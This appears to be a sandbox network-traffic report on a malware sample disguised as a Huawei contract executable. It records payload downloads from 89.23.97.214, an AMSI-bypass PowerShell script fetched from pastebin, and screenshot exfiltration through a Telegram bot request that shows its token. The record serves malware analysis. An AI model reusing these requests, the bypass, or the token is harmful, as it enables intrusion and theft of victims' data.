Feb 17, 2025 19:37:12.293416977 CET | 50002 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:37:12.293838024 CET | 50002 | 443 | 192.168.2.6 | 149.154.167.220
Feb 17, 2025 19:37:12.293852091 CET | 443 | 50002 | 149.154.167.220 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 17, 2025 19:35:25.437515974 CET | 58262 | 53 | 192.168.2.6 | 1.1.1.1
Feb 17, 2025 19:35:25.444791079 CET | 53 | 58262 | 1.1.1.1 | 192.168.2.6
Feb 17, 2025 19:35:39.667628050 CET | 49878 | 53 | 192.168.2.6 | 1.1.1.1
Feb 17, 2025 19:35:39.917751074 CET | 53 | 49878 | 1.1.1.1 | 192.168.2.6
Feb 17, 2025 19:35:40.411098957 CET | 51783 | 53 | 192.168.2.6 | 1.1.1.1
Feb 17, 2025 19:35:40.417887926 CET | 53 | 51783 | 1.1.1.1 | 192.168.2.6
Feb 17, 2025 19:35:41.290235996 CET | 61658 | 53 | 192.168.2.6 | 1.1.1.1
Feb 17, 2025 19:35:41.297075987 CET | 53 | 61658 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 17, 2025 19:35:25.437515974 CET | 192.168.2.6 | 1.1.1.1 | 0xed4b | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:39.667628050 CET | 192.168.2.6 | 1.1.1.1 | 0xa751 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:40.411098957 CET | 192.168.2.6 | 1.1.1.1 | 0xfdb1 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:41.290235996 CET | 192.168.2.6 | 1.1.1.1 | 0xbc9c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 17, 2025 19:35:25.444791079 CET | 1.1.1.1 | 192.168.2.6 | 0xed4b | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:25.444791079 CET | 1.1.1.1 | 192.168.2.6 | 0xed4b | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:25.444791079 CET | 1.1.1.1 | 192.168.2.6 | 0xed4b | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:39.917751074 CET | 1.1.1.1 | 192.168.2.6 | 0xa751 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:39.917751074 CET | 1.1.1.1 | 192.168.2.6 | 0xa751 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:39.917751074 CET | 1.1.1.1 | 192.168.2.6 | 0xa751 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:40.417887926 CET | 1.1.1.1 | 192.168.2.6 | 0xfdb1 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Feb 17, 2025 19:35:41.297075987 CET | 1.1.1.1 | 192.168.2.6 | 0xbc9c | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• pastebin.com
• api.telegram.org
• api.ipify.org
• ip-api.com
• 89.23.97.214
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49778 | 104.26.12.205 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:35:39.933170080 CET | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
Feb 17, 2025 19:35:40.392990112 CET | 429 | IN | HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 18:35:40 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 9137e0e91d440c94-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=39&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49785 | 208.95.112.1 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:35:40.427426100 CET | 53 | OUT | GET /json/8.46.123.189 HTTP/1.1
Host: ip-api.com
Feb 17, 2025 19:35:40.894540071 CET | 482 | IN | HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 18:35:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/Chicago","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49825 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:35:45.872164965 CET | 52 | OUT | GET /Team/BILLI.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49824 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:35:45.872361898 CET | 51 | OUT | GET /Team/32cv.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49960 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:36:07.258047104 CET | 52 | OUT | GET /Team/BILLI.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49961 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:36:07.268609047 CET | 51 | OUT | GET /Team/32cv.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49994 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:36:28.664127111 CET | 51 | OUT | GET /Team/32cv.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49995 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:36:28.665585995 CET | 52 | OUT | GET /Team/BILLI.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49999 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:36:50.036993980 CET | 51 | OUT | GET /Team/32cv.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49998 | 89.23.97.214 | 80 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
Timestamp | Bytes transferred | Direction | Data
Feb 17, 2025 19:36:50.037058115 CET | 52 | OUT | GET /Team/BILLI.exe HTTP/1.1
Host: 89.23.97.214


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49706 | 172.67.19.24 | 443 | 876 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-17 18:35:26 UTC | 169 | OUT | GET /raw/WHKzW2nr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2025-02-17 18:35:26 UTC | 391 | IN | HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 18:35:26 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 17 Feb 2025 18:35:26 GMT
Server: cloudflare
CF-RAY: 9137e08ff96032e4-EWR
2025-02-17 18:35:26 UTC | 978 | IN | Data Raw: 31 37 33 37 0d 0a 0d 0a 0d 0a 41 64 64 2d 54 79 70 65 20 2d 54 79 70 65 44 65 66 69 6e 69 74 69 6f 6e 20 40 22 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 3b 0d 0a 0d 0a 70 75 62 6c 69 63 20 63 6c 61 73 73 20 4e 75 6b 65 41 4d 53 49 0d 0a 7b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 4f 50 45 52 41 54 49 4f 4e 20 3d 20 30 78 30 30 30 38 3b 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6f 6e 73 74 20 69 6e 74 20 50 52 4f 43 45 53 53 5f 56 4d 5f 52 45 41 44 20 3d 20 30 78 30 30 31 30 3b 0d 0a 20 20 20 20 70 75
Data Ascii: 1737Add-Type -TypeDefinition @"using System;using System.Diagnostics;using System.Runtime.InteropServices;public class NukeAMSI{ public const int PROCESS_VM_OPERATION = 0x0008; public const int PROCESS_VM_READ = 0x0010; pu
2025-02-17 18:35:26 UTC | 1369 | IN | Data Raw: 74 72 20 48 61 6e 64 6c 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 4c 6f 61 64 4c 69 62 72 61 72 79 3a 20 4c 6f 61 64 73 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 6d 6f 64 75 6c 65 20 69 6e 74 6f 20 74 68 65 20 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 66 20 74 68 65 20 63 61 6c 6c 69 6e 67 20 70 72 6f 63 65 73 73 2e 0d 0a 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 29 5d 0d 0a 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 49 6e 74 50 74 72 20 4c 6f 61 64 4c 69 62 72 61 72 79 28 73 74 72 69 6e 67 20 6c 70 46 69 6c 65 4e 61 6d 65 29 3b 0d 0a 0d 0a 20 20 20 20 2f 2f 20 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 3a 20 52
Data Ascii: tr Handle); // LoadLibrary: Loads the specified module into the address space of the calling process. [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr LoadLibrary(string lpFileName); // GetProcAddress: R
2025-02-17 18:35:26 UTC | 1369 | IN | Data Raw: 73 73 49 64 0d 0a 20 20 20 20 29 0d 0a 0d 0a 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 4d 6f 64 69 66 79 69 6e 67 20 41 4d 53 49 20 66 6f 72 20 70 72 6f 63 65 73 73 20 49 44 3a 20 24 70 72 6f 63 65 73 73 49 64 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 0d 0a 20 20 20 20 24 70 61 74 63 68 20 3d 20 5b 62 79 74 65 5d 30 78 45 42 20 20 23 20 54 68 65 20 70 61 74 63 68 20 62 79 74 65 20 74 6f 20 6d 6f 64 69 66 79 20 41 4d 53 49 20 62 65 68 61 76 69 6f 72 0d 0a 0d 0a 20 20 20 20 24 6f 62 6a 65 63 74 41 74 74 72 69 62 75 74 65 73 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 75 6b 65 41 4d 53 49 2b 4f 42 4a 45 43 54 5f 41 54 54 52 49 42 55 54 45 53 0d 0a 20 20 20 20 24 63 6c 69 65 6e 74 49 64 20 3d 20 4e 65 77 2d 4f 62 6a 65
                                                                                                                                                                                            Data Ascii: ssId ) Write-Host "Modifying AMSI for process ID: $processId" -ForegroundColor Cyan $patch = [byte]0xEB # The patch byte to modify AMSI behavior $objectAttributes = New-Object NukeAMSI+OBJECT_ATTRIBUTES $clientId = New-Obje
                                                                                                                                                                                            2025-02-17 18:35:26 UTC1369INData Raw: 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 66 69 6e 64 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 20 69 6e 20 61 6d 73 69 2e 64 6c 6c 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a 20 20 20 20 20 20 20 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 4e 74 43 6c 6f 73 65 28 24 68 48 61 6e 64 6c 65 29 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 23 20 43 61 6c 63 75 6c 61 74 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 70 61 74 63 68 20 61 64 64 72 65 73 73 20 62 79 20 6f 66 66 73 65 74 74 69 6e 67 20 66 72 6f 6d 20 41 6d 73 69 4f 70 65 6e 53 65 73 73 69 6f 6e 20 66 75 6e 63 74 69 6f 6e 0d 0a 20 20 20 20 24 70 61 74 63 68 41 64 64 72 20 3d
                                                                                                                                                                                            Data Ascii: Write-Host "Failed to find AmsiOpenSession function in amsi.dll." -ForegroundColor Red [NukeAMSI]::NtClose($hHandle) return } # Calculate the correct patch address by offsetting from AmsiOpenSession function $patchAddr =
                                                                                                                                                                                            2025-02-17 18:35:26 UTC866INData Raw: 6f 6e 2e 2e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 43 79 61 6e 0d 0a 20 20 20 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 20 3d 20 5b 4e 75 6b 65 41 4d 53 49 5d 3a 3a 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 28 24 68 48 61 6e 64 6c 65 2c 20 24 70 61 74 63 68 41 64 64 72 2c 20 24 73 69 7a 65 2c 20 24 6f 6c 64 50 72 6f 74 65 63 74 2c 20 5b 72 65 66 5d 24 6f 6c 64 50 72 6f 74 65 63 74 29 0d 0a 0d 0a 20 20 20 20 69 66 20 28 2d 6e 6f 74 20 24 72 65 73 74 6f 72 65 53 74 61 74 75 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 46 61 69 6c 65 64 20 74 6f 20 72 65 73 74 6f 72 65 20 6d 65 6d 6f 72 79 20 70 72 6f 74 65 63 74 69 6f 6e 2e 22 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 0d 0a
                                                                                                                                                                                            Data Ascii: on..." -ForegroundColor Cyan $restoreStatus = [NukeAMSI]::VirtualProtectEx($hHandle, $patchAddr, $size, $oldProtect, [ref]$oldProtect) if (-not $restoreStatus) { Write-Host "Failed to restore memory protection." -ForegroundColor Red
                                                                                                                                                                                            2025-02-17 18:35:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49792 | 149.154.167.220 | 443 | 2356 | C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-17 18:35:42 UTC | 230 | OUT | POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 HTTP/1.1
Host: api.telegram.org
Content-Type: multipart/form-data; boundary="e4a0611f-b7c4-4266-9d16-9a0547683bdd"
Content-Length: 694321
                                                                                                                                                                                            2025-02-17 18:35:42 UTC3866OUTData Raw: 2d 2d 65 34 61 30 36 31 31 66 2d 62 37 63 34 2d 34 32 36 36 2d 39 64 31 36 2d 39 61 30 35 34 37 36 38 33 62 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 30 32 35 2d 30 32 2d 31 37 2d 31 33 2d 33 35 2d 33 39 2d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 30 32 35 2d 30 32 2d 31 37 2d 31 33 2d 33 35 2d 33 39 2d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00
                                                                                                                                                                                            Data Ascii: --e4a0611f-b7c4-4266-9d16-9a0547683bddContent-Disposition: form-data; name=photo; filename=2025-02-17-13-35-39-screenshot.png; filename*=utf-8''2025-02-17-13-35-39-screenshot.pngPNGIHDRCsRGBgAMAapHYs
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 6b c5 98 00 1c 19 9e e4 6b 85 15 80 bd 90 80 63 02 b0 33 c6 04 60 77 02 30 a7 5b 01 68 c5 5d 83 98 8b 31 e4 5f 2e 00 41 63 c5 f2 b1 f6 51 5f 63 61 c7 ed 04 a0 90 90 13 12 80 9a 57 75 a0 e6 25 ee 9a d1 4e 00 4a 32 d2 4f 73 19 b9 04 ac 04 20 2f 01 89 34 7b 09 48 3b f1 67 f1 8e 00 ab 8f fc e3 39 80 12 80 88 3d 2b 00 f3 18 7d c9 bf 34 76 a4 9f 05 89 67 ab 00 69 2d b6 e2 0f ac 00 64 1d 32 0f 81 67 ab f9 34 06 c9 40 7b 2c 98 b1 8d 2b 57 32 d0 ae b7 b2 4f f2 4f 31 64 9f da 24 f9 ca 39 a4 9f 9e 19 58 e5 67 22 0f 79 07 88 3c 89 40 f5 c1 1e 0d 66 8e 5c 8e 0c 23 10 95 4b 8b ec 43 fc d9 0a c0 d4 96 02 10 c1 57 9b 7e 47 92 79 3a ee ab 39 62 12 7f 92 7f b9 00 a4 ea 8f 8a 3f 55 ff a9 02 90 f1 24 3e 5b 29 fc 20 97 80 60 45 20 fd 3c cf 0a 3e 2b 00 15 17 8c 55 2d 48 0e b9
                                                                                                                                                                                            Data Ascii: kkc3`w0[h]1_.AcQ_caWu%NJ2Os /4{H;g9=+}4vgi-d2g4@{,+W2OO1d$9Xg"y<@f\#KCW~Gy:9b?U$>[) `E <>+U-H
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: fa 6f f5 60 f5 5f 58 79 41 12 80 92 58 5b 9c 77 58 25 a4 ee 5b ba 24 dc bb 68 61 78 f2 89 c7 c3 fd 4b ee 68 10 7c 0f 3d bb 3a cc fa f1 8b e1 c7 f7 af 1b 55 01 e8 cd 8f 14 2b ed 72 10 7f fa a5 2a 40 55 06 d2 7e ec 98 1d 87 ac 11 fa de 3e 0a 02 f0 22 04 a0 f3 0c c0 46 f1 17 db 77 7f 1b d6 bc fe 4e f8 93 ef 3d 11 3e 76 c2 f2 b0 3a f6 db cb 3f 28 de fc eb 0a c0 53 c6 04 a0 90 fc 13 12 77 bd c2 93 7e 16 4f e0 f5 02 4f f6 79 e4 82 af 1d 95 d8 8b fd 4d 59 00 56 38 b2 cf 63 34 e4 1f 78 d2 cf e2 49 bd 6e f0 a5 9f 65 a8 e0 eb 06 4f fa 59 3c c1 d7 09 9e cc 1b 0e b9 00 1c ae 04 1c 13 80 3e ae d4 eb 86 4c f0 b5 c3 93 7d 1e ae ec f3 30 a2 af 15 b9 e0 83 56 f3 9d 0a c0 71 5f 7c dc 15 7d cd b0 d2 2f 27 97 7f 89 52 ee 59 c9 97 0b 3d 3b c7 b8 9d f4 b3 48 ea 89 66 42 30 8f
                                                                                                                                                                                            Data Ascii: o`_XyAX[wX%[$haxKh|=:U+r*@U~>"FwN=>v:?(Sw~OOyMYV8c4xIneOY<>L}0Vq_|}/'RY=;HfB0
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 16 15 80 71 8f 99 71 6d 6c fb 76 5f 10 fa f7 58 98 c6 13 f7 89 f7 1c 5b 62 03 7b c6 75 06 72 69 99 93 2c 44 20 aa 2a 30 09 c2 4c 0a 22 ee 54 1d 28 89 87 dc 23 8f a3 bc c4 26 ce 8c 3f 87 5d 8b e3 bd cc e9 f9 82 ca b3 54 f1 52 ec 21 f4 f2 ea 3e 5b 15 68 f3 92 f8 9b 71 77 42 39 c4 98 4f 55 81 71 7d 15 db b9 78 f6 9f 64 a0 e4 1f 70 44 58 c2 d0 ce 11 63 0d 47 84 25 17 55 3d 08 5a 0f 12 86 92 86 88 c1 da 8e 45 15 1e cf e7 a3 45 ac 71 4c 17 99 06 3a b6 2b b9 66 63 8a 4b c8 e5 82 4e b9 9a d3 3c 71 ad b3 7d e5 08 dd 8f f6 21 46 4b 9c a3 c1 cc b1 9f 2a 09 b5 87 c6 da 97 9c 74 dd 12 64 1c d8 31 92 4e 42 90 16 79 47 ab ca be 54 e5 37 2d fe ac a7 c4 ef 6d fb 38 1f 19 b7 63 dc 23 8e 81 fe 84 9d e2 cf 69 ea fc 84 cd 1b d8 21 5e 23 ce b1 be 6f bb 3b aa 7c fa cc 01 31 5a
                                                                                                                                                                                            Data Ascii: qqmlv_X[b{uri,D *0L"T(#&?]TR!>[hqwB9OUq}xdpDXcG%U=ZEEqL:+fcKN<q}!FK*td1NByGT7-m8c#i!^#o;|1Z
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 67 7c 27 f4 ef 7c 56 aa d8 a2 32 b0 9e be d7 7f 13 66 dd 52 e6 f0 bc c6 69 1c b1 3e a3 ca 49 12 8d d8 d4 c8 27 4c 35 19 71 62 9f 9f 17 63 eb ca 37 ee f2 6c 3a bd 7d b7 ec 7f ef dc 42 ec b5 79 53 70 df 9c c8 f7 11 6c 27 14 42 0b 69 85 54 aa c4 5a f9 f9 90 49 c8 29 3d 23 f0 af 3f 11 db dd 0a 19 8a f4 e3 67 75 d8 4d c5 7a 8e c5 22 d2 d2 7d c7 65 55 e5 9b fd 39 47 ec 77 89 88 3b 94 f5 71 3f 8e f6 6e 75 78 f1 fc bf ef 2d 0d b3 2f b9 aa 10 80 1c 03 4e f7 58 fe 5e 43 00 fe 39 2f 66 e1 19 92 92 8c b5 30 eb c6 98 80 1c a3 92 30 bd 30 24 7e af cf c5 18 df 6b 12 8f dc 47 29 df 18 a7 cf 76 66 7a 5e 5e ba 2e c2 d0 11 80 b5 b9 0f 87 d9 47 9c 50 48 b8 7f b7 7d 92 97 e9 79 80 71 8f e4 da d8 83 ef e6 cf ff b6 f8 d9 22 07 f3 fd 39 0e cc cb 3f f8 ee 90 9f 08 cf 98 43 85 20
                                                                                                                                                                                            Data Ascii: g|'|V2fRi>I'L5qbc7l:}BySpl'BiTZI)=#?guMz"}eU9Gw;q?nux-/NX^C9/f000$~kG)vfz^^.GPH}yq"9?C
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: 92 e7 d8 4a c2 63 4f 00 06 f9 b7 2f 00 b7 92 be c3 0a 64 7b ee 8c f2 d7 ac 90 c9 bd 65 98 92 7f 40 6c 05 a2 00 cc 44 e0 fa a5 77 55 a2 08 a4 0f 35 ce 77 05 93 db 85 ad 00 cc 44 e0 b4 10 9c ae fe 53 fe 8d 02 ae f4 89 6d 9c d3 13 45 e0 be 00 cc a5 5f 24 93 6f c7 02 fb 02 b0 a7 15 7b 2d 6b 08 3b c4 dd 8c f8 22 8e 25 f9 07 fb 02 b0 ac df 45 32 99 b7 1d 32 e9 17 c9 e4 de 32 64 b2 2f 23 93 7a ab 90 c9 3f c8 24 df 3c d6 12 c9 37 8f 9d c8 3f d8 53 f9 07 89 dc 5b 86 7b 8b 00 6c b1 02 30 72 6f 16 80 8a bf 2a ff 88 29 ec 9a 23 c0 c6 c7 f9 21 be 88 98 9f 09 40 c5 5f 2b 00 95 7c ad f8 13 c5 5f ec a7 3c f7 8b 15 25 9f 18 8f 73 0a bd 76 9c e5 b6 39 b4 51 10 d2 27 ee e5 1e 99 c4 83 59 31 99 92 78 4d 9e 30 b7 45 f8 95 38 cf 54 06 ce 12 80 54 ff d1 47 c8 b5 42 8f ea 3f 65
                                                                                                                                                                                            Data Ascii: JcO/d{e@lDwU5wDSmE_$o{-k;"%E222d/#z?$<7?S[{l0ro*)#!@_+|_<%sv9Q'Y1xM0E8TTGB?e
                                                                                                                                                                                            2025-02-17 18:35:42 UTC16355OUTData Raw: ce ec 85 da 2c 39 17 a5 5f 94 74 99 f4 8b c4 5c c8 f6 87 36 0f 52 11 37 83 2c 77 37 c9 c4 5f 64 5f 00 ce 27 97 7e 91 f2 1e bb c4 be 00 5c cc 3d 21 00 e7 49 c0 4c f2 2d e2 58 15 80 10 e5 df a6 e4 3b 76 04 60 cb fd 51 00 2a ff 96 11 80 99 f8 8b b4 32 af 15 80 8b 40 fe c1 24 93 7f 09 b1 32 30 63 2f 04 20 64 f2 0f a2 d0 53 e4 55 31 37 8c db f9 48 cc a3 bf aa fc 83 58 15 d8 0a 40 50 00 ce 22 93 80 88 bd c8 3c 01 a8 d8 8b 02 50 f9 47 9f b9 38 76 5e 09 18 65 1d 7d 05 a0 12 30 f6 53 98 2b 58 79 18 e7 dc cf 67 d4 8a c1 e1 db 7f 54 04 1e 7e 76 79 ef 67 94 f5 05 24 20 44 01 08 08 c0 c3 cf 28 73 4f 2b ef 52 40 da d1 2a f2 14 7d 51 00 c6 98 63 25 60 94 83 b4 6b a7 5e 53 c9 44 60 2f 03 3f 57 41 f8 45 d6 4e bd aa 9b 3c f1 b3 75 0d a2 90 8a 40 44 9f 47 84 61 8d 6a 37 c4
                                                                                                                                                                                            Data Ascii: ,9_t\6R7,w7_d_'~\=!IL-X;v`Q*2@$20c/ dSU17HX@P"<PG8v^e}0S+XygT~vyg$ D(sO+R@*}Qc%`k^SD`/?WAEN<u@DGaj7
